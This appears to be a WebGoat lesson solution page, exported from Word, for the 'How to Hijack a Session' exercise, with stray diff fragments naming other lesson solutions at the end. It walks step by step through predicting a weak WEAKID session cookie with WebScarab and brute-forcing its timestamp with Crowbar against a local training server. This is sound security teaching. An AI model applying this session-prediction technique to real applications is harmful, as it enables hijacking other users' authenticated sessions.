UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Wingdings;
panose-1:5 0 0 0 0 0 0 0 0 0;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 268435456 0 0 -2147483648 0;}
@font-face
{font-family:"MS Mincho";
panose-1:2 2 6 9 4 2 5 8 3 4;
mso-font-alt:"\FF2D\FF33 \660E\671D";
mso-font-charset:128;
mso-generic-font-family:modern;
mso-font-pitch:fixed;
mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;
mso-font-charset:0;
mso-generic-font-family:roman;
mso-font-pitch:variable;
mso-font-signature:-1610611985 1107304683 0 0 159 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
@font-face
{font-family:"\@MS Mincho";
panose-1:2 2 6 9 4 2 5 8 3 4;
mso-font-charset:128;
mso-generic-font-family:modern;
mso-font-pitch:fixed;
mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";}
h1
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-link:"Heading 1 Char";
mso-style-next:Normal;
margin-top:12.0pt;
margin-right:0cm;
margin-bottom:3.0pt;
margin-left:0cm;
mso-pagination:widow-orphan;
page-break-after:avoid;
mso-outline-level:1;
font-size:16.0pt;
font-family:"Arial","sans-serif";
mso-fareast-font-family:"MS Mincho";
mso-font-kerning:16.0pt;
mso-fareast-language:JA;
font-weight:bold;}
h2
{mso-style-noshow:yes;
mso-style-priority:9;
mso-style-qformat:yes;
mso-style-link:"Heading 2 Char";
mso-style-next:Normal;
margin-top:10.0pt;
margin-right:0cm;
margin-bottom:0cm;
margin-left:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan lines-together;
page-break-after:avoid;
mso-outline-level:2;
font-size:13.0pt;
font-family:"Cambria","serif";
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:major-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:major-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;
color:#4F81BD;
mso-themecolor:accent1;
font-weight:bold;}
p.MsoCaption, li.MsoCaption, div.MsoCaption
{mso-style-noshow:yes;
mso-style-qformat:yes;
mso-style-next:Normal;
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";
font-weight:bold;}
p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
{mso-style-noshow:yes;
mso-style-priority:99;
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;}
a:link, span.MsoHyperlink
{mso-style-noshow:yes;
color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-noshow:yes;
mso-style-priority:99;
color:purple;
mso-themecolor:followedhyperlink;
text-decoration:underline;
text-underline:single;}
p
{mso-style-noshow:yes;
mso-style-priority:99;
mso-margin-top-alt:auto;
margin-right:0cm;
mso-margin-bottom-alt:auto;
margin-left:0cm;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
mso-style-priority:99;
mso-style-link:"Balloon Text Char";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-fareast-font-family:"Times New Roman";}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Heading 1";
mso-ansi-font-size:16.0pt;
mso-bidi-font-size:16.0pt;
font-family:"MS Mincho";
mso-ascii-font-family:"MS Mincho";
mso-fareast-font-family:"MS Mincho";
mso-hansi-font-family:"MS Mincho";
mso-bidi-font-family:Arial;
mso-font-kerning:16.0pt;
mso-fareast-language:JA;
font-weight:bold;}
span.Heading2Char
{mso-style-name:"Heading 2 Char";
mso-style-noshow:yes;
mso-style-priority:9;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Heading 2";
mso-ansi-font-size:13.0pt;
mso-bidi-font-size:13.0pt;
font-family:"Cambria","serif";
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:major-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:major-latin;
color:#4F81BD;
mso-themecolor:accent1;
font-weight:bold;}
span.BalloonTextChar
{mso-style-name:"Balloon Text Char";
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Balloon Text";
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-ascii-font-family:Tahoma;
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-size:10.0pt;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
mso-ascii-font-family:Arial;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Arial;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;}
@page Section1
{size:612.0pt 792.0pt;
margin:72.0pt 72.0pt 72.0pt 72.0pt;
mso-header-margin:35.4pt;
mso-footer-margin:35.4pt;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Arial","sans-serif";
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="3074"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>
<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
<div class=Section1>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
Hijack a Session<o:p></o:p></span></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<!-- Start Instructions -->
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Application
developers who develop their own session IDs frequently forget to incorporate
the complexity and randomness necessary for security. If the user specific
session ID is not complex and random, then the application is highly
susceptible to session-based brute force attacks. <o:p></o:p></span></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Try to access
an authenticated session belonging to someone else. <o:p></o:p></span></p>
<!-- Stop Instructions -->
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In this
lesson the purpose is to predict the WEAKID value. The WEAKID is used to
differentiate authenticated and anonymous users of WebGoat.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_785" o:spid="_x0000_i1034" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image020.jpg" v:shapes="Picture_x0020_785"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The easiest
way to complete this lesson is to use WebScarab's Session ID Analysis.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Go to
WebScarab and click on the button "SessionID Analysis". Select the last POST
request from the "Previous requests" drop-down box.<o:p></o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_786"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image021.jpg" v:shapes="Picture_x0020_786"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> WebScarabs SessionID Analysis<span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To make sure
that WebScarab is able to fetch the WEAKID cookie, you need to click the "Test"
button on the bottom of the screen. A pop-up window must be shown like below.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_787"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image005.png" o:title="" cropbottom="2719f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="lesson_solutions/WeakSessionID_files/image022.jpg" v:shapes="Picture_x0020_787"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> SessionID WEAKID discovered<span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you dont
have a pop-up window with the Extracted Sessionids, you must edit the Request.
You must delete the WEAKID value from the request. Without this cookie value,
WebGoat will return a HTTP Header "Set-Cookie: WEAKID=value" so WebScarab
learns about this value.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Fetch 50
samples and examine the results. Enter "50" in the "Samples" window and click
the button "Fetch". You will not see any information about progress.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_788" o:spid="_x0000_i1031"
type="#_x0000_t75" style='width:480pt;height:17.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" croptop="61471f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=23
src="lesson_solutions/WeakSessionID_files/image023.jpg" v:shapes="Picture_x0020_788"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you need
to go to the tab "Analysis".<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_789" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:480pt;height:53.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" cropbottom="52914f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=71
src="lesson_solutions/WeakSessionID_files/image024.jpg" v:shapes="Picture_x0020_789"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In the "Analysis"
pane you see nothing. <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_790" o:spid="_x0000_i1029"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image010.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image025.jpg" v:shapes="Picture_x0020_790"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You must
select the Session Identifier WEAKID value from the drop-down box.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_791" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image012.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image026.jpg" v:shapes="Picture_x0020_791"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The WEAKID is
divided in 2 parts: the first part is an identifier that is added 1 in every
cookie and a time value. The time value is calculated at the moment that you
submit the request.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Notice that
there is sometimes a gap in the first value of the WEAKID, skipping with 1. The
value that is missing is the value that you need to know to log on. Now you
only need to calculate the timestamp. This can be brute-forced using Crowbar.
You know the previous timestamp and the next timestamp so you have a start and
end value.<br>
You can download Crowbar for free: <a href="http://www.sensepost.com/research/crowbar/" target="_blank">http://www.sensepost.com/research/crowbar/</a>
<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_792" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480.75pt;height:338.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image014.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=641 height=451
src="lesson_solutions/WeakSessionID_files/image027.jpg" v:shapes="Picture_x0020_792"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>There is a
value 16935 and a value 16937 with a numeric difference of 28110 instead of
14109, so there the WEAKID cookie is located. Copy and paste the raw HTTP
request in Crowbar:<o:p></o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_793"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:447pt;height:382.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image016.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=596 height=510
src="lesson_solutions/WeakSessionID_files/image028.jpg" v:shapes="Picture_x0020_793"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> Crowbar<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Change target
to localhost and adjust the port.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Create a Base
response. Make sure that you see "How to hijack a session" in the middle
window.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Insert ##1##
in the WEAKID parameter where you want to brute-force the value and be aware, that the first part of the WEAKID is the one we are searching for (16936).
The WEAKID in Crowbar lookes like this: Cookie: JSESSIONID=...; WEAKID=1693<font color="ff0000">6</font>-1163685<font color="ff0000">##1##</font>;<br>
Start the first loop at 363093, the last digits of the last cookie before the
authentication cookie and 363203, the first cookie after the authentication
cookie. You have to enter these two values in the Parameter1 fields. We have to brute-force these values, but we are sure that they lie
between these two boundaries.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Examine the
results until you see a different fuzzy logic value (the blue line in Figure 3), right-click it and click on "Show
reply".<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_794"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:481.5pt;height:345.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image018.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=461
src="lesson_solutions/WeakSessionID_files/image029.jpg" v:shapes="Picture_x0020_794"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> Lesson 12 Completed<span style='font-family:
"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><o:p>&nbsp;</o:p></p>
</div>
<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
<tr>
<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
Solution by Erwin Geirnaert
</td>
<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
</tr>
</table>
</body>
</html>


@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Web Service SAX Injection</title>
<link rel=File-List href="lesson_solutions/WsSAXInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WsSAXInjection_files/editdata.mso">
<!--[if !mso]>


@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Web Service SQL Injection</title>
<link rel=File-List href="lesson_solutions/WsSqlInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WsSqlInjection_files/editdata.mso">
<!--[if !mso]>
